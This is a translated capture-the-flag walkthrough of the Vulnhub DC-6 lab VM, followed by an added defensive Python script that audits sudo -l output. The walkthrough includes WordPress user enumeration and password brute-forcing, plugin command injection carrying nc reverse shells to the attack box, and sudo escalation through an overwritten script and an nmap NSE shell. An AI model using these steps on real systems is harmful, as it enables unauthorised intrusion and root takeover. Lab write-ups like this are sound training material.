Disclaimer
The tools, tutorials, learning paths and articles provided by this public account are either original or collected from the internet, and are published solely to improve network-security skills and for technical research. Please observe the relevant national laws and regulations and do not use them for illegal purposes. If you have questions about the content, join the discussion group or leave a private message; if any content infringes your rights, contact the editor to have it handled.
Content overview
This is the 5th target machine in the weekly hands-on series that 网络安全自修室 runs with its members. Anyone interested is welcome to follow along and do it yourself; practice is where real understanding comes from.
The VM can be downloaded for free from Vulnhub and run locally in a hypervisor. The exercise is a hunt for the flags inside the target, with the final flag as the goal.
Attack box: Kali Linux
Target: 192.168.241.139
Tools used: nmap | wpscan | nc | BurpSuite
A full-range masscan shows that ports 80 and 22 are open:
sudo masscan --min-rate=10000 192.168.241.139 -p-
Run detailed service and OS detection against the open ports (note that -oN writes nmap's normal text output, so despite the .xml name the file is plain text; -oX is the XML format):
sudo nmap -O -sC -sV 192.168.241.139 -p 80,22 -oN 139.xml
From the enumeration so far: the target is Linux with ports 22 and 80 open, and the web service is built on WordPress. Experience says the web application is the better entry point, so the plan is to brute-force the WordPress login and the SSH service with a wordlist.
Note that port 80 is open but the site does not load directly: it redirects to the hostname wordy. Add the IP-to-hostname mapping to the hosts file:
Windows 10 path: C:\Windows\System32\drivers\etc\hosts
Linux path: /etc/hosts
Enumerate users with wpscan; it finds 5 users (note that the WordPress REST endpoint wp-json/wp/v2/users lists them to unauthenticated clients). Save them to users.txt:
wpscan --url wordy -e u
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
With usernames in hand, only a password list is needed for the brute force. The official hint says the passwords contain the string k01, so filtering rockyou.txt on that substring cuts the cracking time considerably.
Generate the wordlist from the hint:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Start the brute force:
wpscan --url http://wordy/ -U users.txt -P passwords.txt
Credentials recovered: mark / helpdesk01
Logging into the admin backend shows an activity-monitor plugin with a command-execution vulnerability.
Intercept the request in BurpSuite and inject an nc reverse shell (192.168.241.129 is the Kali attack box; start the listener there first). Note that the -e option only exists in netcat-traditional and ncat; the OpenBSD netcat shipped by default on many distributions does not support it.
nc 192.168.241.129 2222 -e /bin/bash
Upgrade to an interactive shell with Python's pty module:
python -c "import pty;pty.spawn('/bin/bash')"
root@bbkali:/tmp/dc6# nc -lvp 2222
listening on [any] 2222 ...
connect to [192.168.241.129] from wordy [192.168.241.139] 36108
python -c "import pty;pty.spawn('/bin/bash')"
Routine browsing of the home directories turns up a useful hint in things-to-do.txt:
www-data@dc-6:/home$ ls -R
.:
graham jens mark sarah
./graham:
./jens:
backups.sh
./mark:
stuff
./mark/stuff:
things-to-do.txt
./sarah:
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
This gives graham's password: GSo7isUM1D4
Log in as graham over SSH; sudo -l shows that backups.sh can be used for privilege escalation:
graham@dc-6:/home$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/home$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
The script runs as jens but is writable by graham, so replace its contents with an nc reverse shell (listener on port 2223 on the attack box) and run it as jens:
graham@dc-6:/home/jens$ cat backups.sh
nc 192.168.241.129 2223 -e /bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
This yields a shell as jens; sudo -l shows that jens can run nmap as root without a password:
pwd
/home
whoami
jens
sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
Write an NSE script (nmap scripts are Lua, and os.execute runs a command from the nmap process, which here is root):
echo 'os.execute("/bin/sh")' > root.nse
Run the script to get a root shell and read the flag:
sudo nmap --script=/home/jens/root.nse
jens@dc-6:~$ sudo nmap --script=/home/jens/root.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-07 00:06 AEST
# pwd
/home/jens
# whoami
root
# cd /root
# ls
theflag.txt
# cat theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
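Both escalation steps above, graham's NOPASSWD rule on a script he can overwrite and jens's NOPASSWD rule on nmap, which runs arbitrary Lua, are instances of one misconfiguration: a sudo target the caller can control. The following audit script is an added example, not part of the original walkthrough or the DC-6 VM. It parses sudo -l output and flags entries whose target is modifiable by the caller or is a binary that can spawn a shell. The two sample outputs are transcribed from the page; the list of shell-escape binaries and the can_modify check are the author's own assumptions, not an exhaustive catalogue.

```python
"""Audit `sudo -l` output for escalation paths (added example, not from the page)."""
import os
import re
from dataclasses import dataclass

# Binaries that hand out a shell when run via sudo: nmap runs arbitrary Lua
# through --script (the DC-6 trick); the rest are well-known equivalents.
# Assumption: this list is illustrative, not complete.
SHELL_ESCAPES = {
    "nmap", "vi", "vim", "less", "more", "find", "awk", "perl",
    "python", "python3", "bash", "sh", "env", "tar", "zip",
}

# Matches a rule line such as "    (jens) NOPASSWD: /home/jens/backups.sh"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class Finding:
    runas: str      # user the command runs as, e.g. "jens" or "root"
    nopasswd: bool  # True when sudo asks for no password
    command: str    # the sudoers command spec
    reason: str     # why it is an escalation path


def parse_sudo_l(text: str):
    """Yield (runas, nopasswd, command) for each command spec in `sudo -l` output.
    Only lines after the "User X may run the following commands" header are
    parsed, so the Defaults block (env_reset, secure_path, ...) is ignored."""
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                yield m.group("runas"), nopasswd, cmd


def caller_can_modify(path: str) -> bool:
    """True if the current user can rewrite `path`, or replace it because the
    containing directory is writable (the graham -> jens case)."""
    if os.access(path, os.W_OK):
        return True
    return os.access(os.path.dirname(path) or "/", os.W_OK)


def audit_sudo_l(text: str, can_modify=caller_can_modify) -> list:
    """Return Findings for risky entries. `can_modify` is injectable so the
    logic can be checked against captured output on a different host."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        target = cmd.split()[0]
        if target == "ALL":
            findings.append(Finding(runas, nopasswd, cmd, "unrestricted command"))
            continue
        if can_modify(target):
            findings.append(Finding(runas, nopasswd, cmd,
                                    "target is modifiable by the caller"))
        name = os.path.basename(target)
        if name in SHELL_ESCAPES:
            findings.append(Finding(runas, nopasswd, cmd,
                                    f"{name} can spawn a shell as {runas}"))
    return findings


# Constructed from the two `sudo -l` outputs shown in the walkthrough.
GRAHAM_SUDO_L = r"""Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
"""

JENS_SUDO_L = r"""Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
"""

if __name__ == "__main__":
    # Treat backups.sh as writable, as it was on DC-6, to show both findings.
    writable = {"/home/jens/backups.sh"}
    for text in (GRAHAM_SUDO_L, JENS_SUDO_L):
        for f in audit_sudo_l(text, can_modify=lambda p: p in writable):
            tag = "NOPASSWD" if f.nopasswd else "password"
            print(f"[{tag}] ({f.runas}) {f.command}: {f.reason}")
```

On a live host, feed it the real output with `sudo -n -l` and the default can_modify, which uses os.access against the actual file and directory permissions. The writable-directory check matters because a root-owned script in a directory the caller owns can still be deleted and recreated, which is just as good as editing it.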